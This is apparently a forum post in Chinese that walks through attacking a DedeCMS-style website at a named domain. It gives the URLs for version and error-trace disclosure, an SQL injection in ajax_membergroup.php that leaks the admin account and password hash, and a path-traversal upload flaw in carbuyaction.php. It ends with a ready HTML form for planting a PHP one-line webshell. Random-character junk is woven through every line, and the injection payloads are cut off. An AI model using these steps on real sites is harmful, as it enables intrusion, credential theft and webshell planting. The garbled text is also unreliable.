①注入漏洞。! D0 Y! S" a& l- T- C! `
这站 http://www.political-security.com/) |/ Z* `1 P; r5 d! f
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,9 O/ c. i/ R3 x$ j+ c
www.political-security.com/data/mysql_error_trace.inc 爆后台, T& h5 p1 h9 `: b' {
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。* J: E8 d& U& ^& d
然后写上语句 . U& t& g7 Y5 a8 O, m# q3 n
查看管理员帐号/ I2 c# X/ a0 }4 o( ]2 L1 R' N
http://www.political-security.co ... &membergroup=@`
! E' O5 `9 W9 ?. t8 p
: ^7 y \, d; dadmin
4 a9 `+ _3 X) N
# {" b! N- J: o% ]查看管理员密码
# W; p' F+ T6 W% g8 M http://www.political-security.co ... &membergroup=@`" E- I2 B5 d0 @1 p
* ?5 p b# O9 s" S
8d29b1ef9f8c5a5af429+ S7 R. b5 Y5 U) b
' {9 X: v8 v* A+ A7 M: f! r q查看管理员密码5 D8 u3 O& \0 K) K
+ V3 U: O1 i, T B
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
! c/ E9 ~& J2 g1 W# U! z8 k$ i& |
6 s- Z5 E/ j% K# {2 ^+ ^# N8d25 H4 A6 Q# V8 [! w W
9b1ef9f8c5a5af42
$ g( U! g6 }2 u+ j9
* `$ d' o7 r! i/ c/ b9 X$ w1 T, Y4 Y! C4 Y; r8 Y6 O* A
cmd5没解出来 只好测试第二个方法9 o9 h4 Q" v5 b, t9 Z1 o8 g
o0 n6 ?2 E, K; T4 Y. v$ O
* b) b: A, m( {, H+ x1 D
②上传漏洞:
" y* e, `0 ?* @
( d9 m$ g$ `: y. \只要登陆会员中心,然后访问页面链接9 w& q5 X! l* s1 l' G9 W. ]
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
+ Y/ ?6 y: \5 q' O& {8 S, B( @
: j7 {! ?5 r* a, f: ?: x如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
9 J9 ~' }- p8 K1 [
/ Z: w$ N B) C/ k于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm& ]6 g# [4 e) A( t
6 O2 F7 _1 g6 F, F<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
$ Y" A l X; j! E# h* K; I* E: {或者9 K# v' i# S3 s9 v p. l2 I
即可上传成功 |